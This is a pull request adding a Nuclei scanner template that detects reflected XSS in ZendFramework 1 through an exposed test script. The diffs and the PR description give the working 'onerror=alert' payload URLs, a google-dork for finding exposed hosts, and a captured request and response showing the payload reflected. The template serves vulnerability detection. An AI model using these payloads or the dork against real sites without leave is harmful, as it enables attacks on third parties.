### PR TITLE
added Reflected XSS for ZendFramework1

### DIFF
--- a/vulnerabilities/zend/zend-v1-xss.yaml
+++ b/vulnerabilities/zend/zend-v1-xss.yaml
@@ -16,16 +16,17 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(1)>%20a='{{randstr}}'>"
-      - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(1)%20a='{{randstr}}'>"
+      - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(1)>%20a='test'>"
+      - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(document.domain)%20a='test'>"
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - '{{randstr}}'
-          - '<img/src=x onerror=alert(1)'
+          - '"redirection"]'
+          - '"param"'
+          - '<img/src=x onerror=alert(document.domain)'
         condition: and
 
       - type: status

--- a/vulnerabilities/zend/zend-v1-xss.yaml
+++ b/vulnerabilities/zend/zend-v1-xss.yaml
@@ -1,0 +1,39 @@
+id: zend-v1-xss
+
+info:
+  name: ZendFramework 1.12.2 - Cross-Site Scripting
+  author: c3l3si4n
+  severity: medium
+  description: ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter.
+  reference:
+    - https://twitter.com/c3l3si4n/status/1600035722148212737
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: zend,zendframework,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(1)>%20a='{{randstr}}'>"
+      - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(1)%20a='{{randstr}}'>"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{randstr}}'
+          - '<img/src=x onerror=alert(1)'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+

--- a/vulnerabilities/zend/zend-v1-xss.yaml
+++ b/vulnerabilities/zend/zend-v1-xss.yaml
@@ -36,4 +36,3 @@ requests:
         part: header
         words:
           - "text/html"
-

--- a/vulnerabilities/zend/zend-v1-xss.yaml
+++ b/vulnerabilities/zend/zend-v1-xss.yaml
@@ -4,21 +4,22 @@ info:
   name: ZendFramework 1.12.2 - Cross-Site Scripting
   author: c3l3si4n
   severity: medium
-  description: ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter.
+  description: |
+    ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter.
   reference:
     - https://twitter.com/c3l3si4n/status/1600035722148212737
-  classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
-    cvss-score: 7.2
-    cwe-id: CWE-79
+  metadata:
+    verified: true
+    google-dork: inurl:"/tests/Zend/Http/"
   tags: zend,zendframework,xss
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(1)>%20a='test'>"
-      - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(document.domain)%20a='test'>"
+      - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(1)>"
+      - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(document.domain)>"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
@@ -29,11 +30,11 @@ requests:
           - '<img/src=x onerror=alert(document.domain)'
         condition: and
 
-      - type: status
-        status:
-          - 200
-
       - type: word
         part: header
         words:
-          - "text/html"
+          - text/html
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information
This is a template for a reflected XSS vulnerability found on ZendFramework 1.
https://packagist.org/packages/diablomedia/zendframework1 

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

```http
GET /vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=%3Cimg/src=x%20onerror=alert(1)%3E HTTP/1.1
Host: 127.0.0.1:8000
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.72 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


```

```http
HTTP/1.1 200 OK
Host: 127.0.0.1:8000
Date: Tue, 06 Dec 2022 07:53:19 GMT
Connection: close
X-Powered-By: PHP/8.1.13
Content-type: text/html; charset=UTF-8

array(2) {
  ["redirection"]=>
  int(4)
  ["param"]=>
  string(28) "<img/src=x onerror=alert(1)>"
}
array(0) {
}

```



### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)